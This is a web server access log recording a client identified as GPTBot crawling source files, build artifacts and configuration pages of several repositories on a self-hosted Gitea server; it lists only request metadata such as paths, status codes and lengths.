"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" -[17/Feb/2026:14:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" -[17/Feb/2026:14:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 22467] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" -[17/Feb/2026:14:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" -[17/Feb/2026:14:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" -[17/Feb/2026:14:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" -[17/Feb/2026:14:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14346] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" -[17/Feb/2026:14:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23040] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" -[17/Feb/2026:14:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18926] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 11798] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" -[17/Feb/2026:14:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 11770] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" -[17/Feb/2026:14:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14721] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11399] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" -[17/Feb/2026:14:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" -[17/Feb/2026:14:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 10557] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:14:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12767] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:14:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fAbout.tsx" [Client 74.7.227.38] [Length 25871] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:14:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14852] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" -[17/Feb/2026:14:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" -[17/Feb/2026:14:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10462] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" -[17/Feb/2026:14:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fHeader.tsx" [Client 74.7.227.38] [Length 26839] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fFooter.tsx" [Client 74.7.227.38] [Length 26212] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fnormalizer" [Client 74.7.227.38] [Length 24109] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:14:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fwebsockets" [Client 74.7.227.38] [Length 24092] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:14:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fContact.tsx" [Client 74.7.227.38] [Length 28728] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fChatBot.tsx" [Client 74.7.227.38] [Length 27738] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fasset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 23152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:14:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fdatabase.py" [Client 74.7.227.38] [Length 25261] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 30282] [Gzip 5.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fcalculator.py" [Client 74.7.227.38] [Length 26178] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10886] [Gzip 3.91] [Sent-to 192.168.0.250] 